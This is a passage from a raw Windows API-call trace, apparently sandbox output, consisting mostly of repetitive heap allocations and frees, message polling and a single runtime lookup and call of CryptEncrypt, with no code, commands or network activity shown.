lpsz="SSA610080612A") returned 0xd [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.729] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.729] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.729] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.729] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0265.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.730] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.730] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.731] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.731] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0265.731] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0265.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.739] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0265.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6468 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0265.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.740] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x11ca6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x11ca8) returned 1 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: 